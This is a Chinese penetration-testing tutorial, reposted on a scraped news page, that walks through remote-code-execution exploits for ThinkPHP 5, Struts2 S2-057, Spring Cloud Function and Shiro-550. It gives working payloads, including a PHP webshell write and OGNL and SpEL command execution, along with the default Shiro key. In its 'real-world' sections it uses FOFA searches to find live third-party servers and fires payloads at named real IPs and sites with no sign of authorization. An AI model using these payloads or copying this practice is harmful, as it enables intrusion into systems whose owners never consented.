当前位置: 首页 > news >正文

公司做企业网站企业管理培训课程价格表

公司做企业网站,企业管理培训课程价格表,几千元的网站建设,设计一套vi的报价1.什么是框架 Web框架(Web framework)或者叫做Web应用框架(Web application framework)#xff0c;是用于进行Web开发的一套软件架构。大多数的Web框架提供了一套开发和部署网站的方式。为Web的行为提供了一套支持的方法。使用Web框架#xff0c;很多的业务逻辑外的功能不需…1.什么是框架 Web框架(Web framework)或者叫做Web应用框架(Web application framework)是用于进行Web开发的一套软件架构。大多数的Web框架提供了一套开发和部署网站的方式。为Web的行为提供了一套支持的方法。使用Web框架很多的业务逻辑外的功能不需要自己再去完善而是使用框架已有的功能就可以。如图片验证码 , 数据库交互语句等 2.Thinkphp 2.1Thinkphp框架介绍 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的是一个快速、兼容而且简单的轻量级国产PHP开发框架诞生于2006年初原名FCS2007年元旦正式更名为ThinkPHP遵循 Apache2开源协议发布从Struts结构移植过来并做了改进和完善同时也借鉴了国外很多优秀的框架和模式使用面向对象的开发结构和MVC模式融合了Struts的思想和TagLib标签库、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/Unix/Linux等服务器环境正式版需要PHP5.0以上版本支持支持 MySql、PgSQL、Sqlite多种数据库以及PDO扩展是一款跨平台跨版本以及简单易用的PHP框架。 官网网址 https://www.thinkphp.cn/ 我们以后可能会遇到的 Thinkphp版本有 , Thinkphp3 , Thinkphp5 , Thinkphp6 , 遇到最多的是 thinkphp5 2.2TP5 rce thinkphp5披露出的最多的漏洞就是rce , 其中的影响的版本范围非常广 5.0.0ThinkPHP55.0.23 、5.1.0ThinkPHP5.1.30 不同版本 payload 不同且5.13版本后还与debug模式有关 ​ poc:漏洞验证 , 一段能够证明漏洞是否存在的代码 exp:漏洞利用 , 一段能够利用漏洞的代码 payload:攻击载荷 Thinkphp5 5.0.22/5.1.29 rce复现 环境搭建 cd vulhub-master/thinkphp/5-rce docker-compose up -d 漏洞原理 漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖通过覆盖类的核心属性filter导致rce其攻击点较为多有些还具有限制条件 poc http://192.168.1.159:8080/index.php? s/Index/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfo  vars[1][]-1 上述poc只是简单的运行了phpinfo , 我们可以修改payload , 进而实现漏洞的利用 ? sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemva  rs[1][]whoami 如果想要写入一句话木马 , 可以使用以下payload ? sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemva  rs[1][]echo ?php eval(\$_POST[1]);? 1.php 补充 : 实验做完记得关闭环境 docker-compose down Thinkphp5 5.0.23 rce复现 环境搭建 cd vulhub-master/thinkphp/5.0.23-rce docker-compose up -d POC http://ip:port/index.php?scaptchapost请求 _method constructfilter[]phpinfomethodgetserver[REQUEST_METHOD]-1 执行系统命令 _method constructfilter[]systemmethodgetserver[REQUEST_METHOD]id 2.3TP的综合利用工具 上面是我们手动测试payload实现的攻击 , 可以把这些整合到一个工具中 , 实现真多thinkphp可能存在的所有漏洞的扫描 , 推荐几个比较好用的工具 , 但是要记住 , 工具是会存在误报的 ThinkPHP.V2.0.by.jar ThinkphpGUI-1.3-SNAPSHOT.jar 2.4实战挖洞 fofa bodythinkphp icon_hash1165838194 bodyV5 随便找的一个 http://64.176.36.205:8080/index.php?scaptchapost请求 _method constructfilter[]phpinfomethodgetserver[REQUEST_METHOD]-1 上面是通过fofa批量找thinkphp框架搭建的网站 , 然后测试是否存在漏洞 如果给你一个网站你如何识别是否使用了thinkphp框架 1. 使用指纹识别插件 Wappalyzer 2. 通过构建报错的url , 根据报错信息判断 3. 根据tp的默认icon 4. 路由格式 .... 关于thinkphp的漏洞远远不止这些 , 像这类历史漏洞 , 大家需要做的是收集并整理 , 以后遇到这种框架 , 你要知道它在历史版本上存在过什么漏洞 , 使用对应的payload或者是工具 , 打就完了 更多利用方式可以参考 GitHub - Mochazz/ThinkPHP-Vuln: 关于ThinkPHP框架的历史漏洞分析集合 Thinkphp5 RCE总结 - Y4er的博客 https://baizesec.github.io/bylibrary/%E6%BC%8F%E6%B4%9E%E5%BA%93/01- CMS%E6%BC%8F%E6%B4%9E/Thinkphp/Thinkphp%205.1.%28-31%29%265.0.%28- 23%29%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ 3.struts2 3.1struts2框架介绍 Struts 2 最初被称为 WebWork 2它是一个简洁的、可扩展的框架可用于创建企业级Java web应用框架。设计这个框架是为了从构建、部署、到应用程序维护方面来简化整个开发周期。 Struts 2 是一个基于MVC设计模式的web应用框架 MVC模型(Model)、视图(View)、控制器(Controller) 模型 --- 属于软件设计模式的底层基础主要负责数据维护。 视图 --- 这部分是负责向用户呈现全部或部分数据。 控制器 --- 通过软件代码控制模型和视图之间的交互。 3.2struts2 rce Struts 2 在2007年7月23日发布的第一个Struts 2漏洞S2-001 , 到现在已经到披露到 s2-062 不同的Struts 2 版本对应的payload是不同的 S2-057远程执行代码漏洞复现 环境搭建 cd vulhub-master/struts2/s2-057 docker-compose up -d 漏洞原理 S2-057漏洞产生于网站配置xml的时候有一个namespace的值该值并没有做详细的安全过滤导致可以写入到XML上尤其url标签值也没有做通配符的过滤导致可以执行远程代码以及系统命令执行。S2-057 先决条件 : alwaysSelectFullNamespace 正确 - 操作元素未设置名称空间属性或使用了通配符用户将从 uri 传递命名空间并将其解析为 OGNL 表达式最终导致远程代码执行漏洞 补充 OGNL表达式 OGNLObject-Graph Navigation Language的简称struts框架使用OGNL作为默认的表达式语言。 它是一种功能强大的表达式语言通过它简单一致的表达式语法可以存取对象的任意属性调用对象的方法遍历整个对象的结构图实现字段类型转化等功能。 OGNL是通常需要结合Struts 2的标志一起使用的主要是#、%、$ 这三个符号的使用#获得contest中的数据%强制字符串解析成OGNL表达式$在配置文件中可以使用OGNL表达式。 访问靶场 1.15.136.212:8080/struts2-showcase POC http://192.168.1.159:8080/struts2-showcase/${(123123)}/actionChain1.action 可以看到中间数字位置相加了 , 说明我们中间的表达式正确的执行了 , 那么我们可以构建可以执行系统命令的表达式进行rce EXP ${(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS). (#ct#request[struts.valueStack].context). (#cr#ct[com.opensymphony.xwork2.ActionContext.container]). (#ou#cr.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)). (#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()). (#ct.setMemberAccess(#dm)).(#ajava.lang.RuntimegetRuntime().exec(whoami)). (org.apache.commons.io.IOUtilstoString(#a.getInputStream()))} /struts2- showcase/%24%7b%0d%0a%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%2 7%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%6 5%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%2 8%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%64%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d/actionChain1.action 3.3综合利用工具 因为s2系列漏洞很多 , 如果全部记下所有的poc和exp非常的不容易 , 而且实战中效率很低 , 这个时候我们可以采用综合利用工具 , 对当前网站测试所有的s2漏洞 Struts 2_v18.09.jar burp被动插件 Struts Finder 3.4实战挖洞 fofa appstruts2 https://www.cerpba.com/ 执行系统命令 给你一个网站你怎么判断是否使用了struts2框架 1. 通过网页后缀来判断如 .do .action有可能不准。 2. 判断 /struts/webconsole.html 是否存在来进行判断需要 devMode 为 true。 3. 通过 actionErrors要求是对应的 Action 需要继承自 ActionSupport 类。如原始 URL 为 https://threathunter.org/则检测所用的 URL 为 https://threathunter.org/?actionErrors1111 如果返回的页面出现异常则可以认定为目标是基于 Struts2 构建的。异常包括但不限于以下几种现象页面直接出现 404 或者 500 等错误。 页面上输出了与业务有关错误消息或者 1111 被回显到了页面上。页面的内容结构发生了明显的改变。 页面发生了重定向。 更多利用方式可以参考 Struts2框架漏洞总结与复现 - FreeBuf网络安全行业门户 https://cwiki.apache.org/confluence/display/WW/SecurityBulletins 4.spring 4.1spring框架介绍 Spring是Java EE编程领域的一个轻量级开源框架该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建是为了解决企业级编程开发中的复杂性业务逻辑层和其他各层的松耦合问题因此它将面向接口的编程思想贯穿整个系统应用实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构分层架构允许使用者选择使用哪一个组件同时为J2EE应用程序开发提供集成的框架。 2009年9月Spring 3.0 RC1发布后Spring就引入了SpEL (Spring Expression Language)。类比Struts2框架会发现绝大部分的安全漏洞都和OGNL脱不了干系。尤其是远程命令执行漏洞这导致Struts2越来越不受待见。 因此Spring引入SpEL必然增加安全风险。事实上过去多个Spring CVE都与其相关如CVE-2017- 8039、CVE-2017-4971、CVE-2016-5007、CVE-2016-4977等 SpEL是什么 SpEL(Spring Expression Language)是基于spring的一个表达式语言类似于struts的OGNL能够在运行时动态执行一些运算甚至一些指令类似于Java的反射功能。就使用方法上来看一共分为三类分别是直接在注解中使用在XML文件中使用和直接在代码块中使用。 SpEL原理如下 1. 表达式:可以认为就是传入的字符串内容2. 解析器︰将字符串解析为表达式内容3. 上下文:表达式对象执行的环境4. 根对象和活动上下文对象∶根对象是默认的活动上下文对象活动上下文对象表示了当前表达式操作的对象。 4.2spring rce Spring Cloud Function SpEL表达式命令注入CVE-2022-22963复现 环境搭建 cd vulhub-master/spring/CVE-2022-22963 docker-compose up -d 漏洞原理 Spring Cloud Function 是基于Spring Boot 的函数计算框架它抽象出所有传输细节和基础架构允许开发人员保留所有熟悉的工具和流程并专注于业务逻辑。 由于Spring Cloud Function中 RoutingFunction类的apply方法将请求头中的“spring.cloud.function.routing-expression”参数作为Spel表达式进行处理造成了Spel表达式注入漏洞未经授权的远程攻击者可利用该漏洞执行任意代码 访问靶场 http://1.15.136.212:8080/ POC 发送如下数据包 spring.cloud.function.routing-expression 头中包含的SpEL表达式将会被执行 POST /functionRouter HTTP/1.1 Host: 10.10.1.6:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(ping y689bh1h.eyes.sh) Content-Type: text/plain Content-Length: 4 test 4.3综合利用工具 spring相关的漏洞很多 , 我们上面复现的漏洞 , 在该工具中没有对应的利用方式 , 使用CVE-2022-22947进行演示 漏洞环境 cd vulhub-master/spring/CVE-2022-22947 docker-compose up -d 利用工具 SpringBoot-Scan-GUI-main 4.4实战挖洞 fofa icon_hash116323821 spring的特征 1. icon 是个小树叶 2. 默认报错页面 3. .... spring 框架还是很流行的框架的很多甲方的网站建设都有使用到该框架进行搭建日常渗透也能经常见到。 更多利用方式参考 【网络安全】Spring框架漏洞总结一_黑客_网络安全学海_InfoQ写作社区 【网络安全】Spring框架漏洞总结二_黑客_网络安全学海_InfoQ写作社区 GitHub - LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料利用方法和技巧合集黑盒安全评估 check list 5.shiro 5.1shiro介绍 Apache Shiro是一个强大易用的Java安全框架提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用同时也能提供健壮的安全性。 5.2shiro 反序列化rce Shiro-550 反序列化rce复现 环境搭建 cd vulhub-master/shiro/CVE-2016-4437 docker-compose up -d 漏洞原理 Apache Shiro框架提供了记住我的功能RememberMe用户登陆成功后会生成经过加密并编码的 cookie。 cookie的key为RememberMecookie的值是经过对相关信息进行序列化然后使用aes加密最后在使用base64编码处理形成的。 在服务端接收cookie值时按照如下步骤来解析处理 1、检索RememberMe cookie 的值 2、Base64解码 3、使用AES解密(加密密钥硬编码) 4、进行反序列化操作未作过滤处理 在调用反序列化时未进行任何过滤导致可以触发远程代码执行漏洞。 利用条件 获得aes的加密密钥在shiro的1.2.4之前版本中使用的是硬编码。其默认密钥的base64编码后的值为 kPHbIxk5D2deZiIxcaaaA这里就可以通过构造恶意的序列化对象进行编码加密然后作为cookie加密发送服务端接收后会解密并触发反序列化漏洞 尽管目前已经更新了许多版本官方并没有对反序列化漏洞本身解决而是通过去掉硬编码的密钥使其每次生成一个密钥来解决该漏洞。但是目前一些开源系统、教程范例代码都使用来固定的编码 这 里我们可以通过搜索引擎、github等来收集密钥提高漏洞检测与利用的成功率。 只要rememberMe的AES加密秘钥泄露无论shiro是什么版本都会导致反序列化漏洞。 漏洞复现 访问 http://1.15.136.212:8080/login 输入账号密码 , 抓包 存在shiro , 这里直接使用工具构造反序列化实现rce 注入内存马 使用冰蝎3.0链接 5.3综合利用工具 burp被动扫描插件 https://github.com/pmiaowu/BurpShiroPassiveScan shiro利用工具 shiro_attack-4.5.3-SNAPSHOT-all.jar 5.4实战挖洞 fofa appApache-Shiro headerremembermedeleteMe headershiroCookie http://47.110.245.84:8000/ 如果给你一个站点 , 你怎么判断是否使用了shiro 响应包中存在字段 set-Cookie: rememberMedeleteMe
http://www.zqtcl.cn/news/772492/

相关文章:

  • 毕设给学校做网站个人店铺logo
  • 中国做w7的网站宿迁网站建设价位
  • 网站建设售后服务合同百度关键词排名点击器
  • 编辑网站用什么软件推广是什么
  • 北京模板开发建站做网站赚钱的点在哪里
  • 网站建设价格兴田德润i网址多少wordpress主题汉化是什么意思
  • 用最少的钱做网站根据域名查询网站名称
  • 网站开发答辩难点网站返回按钮设计
  • 鹤壁做网站优化建设银行理财产品网站
  • 电子商务类网站模板自学网站建设基本流程
  • 无锡网站制作的公司上海企业服务公司
  • 做h5小程序的网站搜索引擎营销案例
  • 订餐网站开发方案查询网站是否正规
  • 建站论坛图片生成器免费
  • 怎么做自己的店铺网站博物馆门户网站建设优势
  • 专业旅游培训网站建设应用之星 wordpress
  • 青海媒体网站建设公司深圳网站建设推广优化公司
  • 网站开发 价格跨境支付互联互通
  • 织梦 修改网站logo营销型网站设计的内容
  • 电商网站运营策划做网站CentOS还是win好
  • 小型企业网站模板企业网站seo点击软件
  • 提供邯郸企业建网站网站图片上怎么做弹幕效果
  • 滨州做网站的wordpress如何添加商桥
  • 网站登录密码忘记网站开发营业执照申请
  • 电商网站设计思路音乐推广平台有哪些
  • 网站建设傲鸿网站链轮内有死链
  • 哪些网站可以做微商品牌宣传网站怎么不花钱做排名 知乎
  • 上传了网站源码怎么做wordpress加百度广告代码出问题
  • 哪些网站做推广vi设计说明模板
  • 杭州市建设工程造价管理协会网站攀枝花建设工程质量监督站投诉网站